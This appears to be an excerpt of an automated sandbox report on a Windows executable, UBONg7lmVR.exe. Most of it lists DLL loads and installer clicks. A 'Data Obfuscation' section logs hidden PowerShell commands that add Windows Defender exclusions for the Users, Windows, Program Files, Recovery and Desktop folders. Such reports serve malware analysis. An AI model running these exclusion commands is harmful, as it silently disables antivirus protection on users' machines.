Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Reka\rapnewsa.exeSection loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exeSection loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exeSection loaded: webio.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exeSection loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exeSection loaded: schannel.dll
Source: C:\Reka\rapnewsa.exeSection loaded: mskeyprotect.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ntasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncrypt.dll
Source: C:\Reka\rapnewsa.exeSection loaded: ncryptsslp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: msasn1.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptsp.dll
Source: C:\Reka\rapnewsa.exeSection loaded: rsaenh.dll
Source: C:\Reka\rapnewsa.exeSection loaded: cryptbase.dll
Source: C:\Reka\rapnewsa.exeSection loaded: gpapi.dll
Source: C:\Reka\rapnewsa.exeSection loaded: windows.storage.dll
Source: C:\Reka\rapnewsa.exeSection loaded: wldp.dll
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: OK
Source: C:\Users\user\Desktop\UBONg7lmVR.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\UBONg7lmVR.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: UBONg7lmVR.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: UBONg7lmVR.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: UBONg7lmVR.exeStatic file information: File size 52506624 > 1048576
Source: UBONg7lmVR.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3211200
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\y5cm2yzz.hwt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
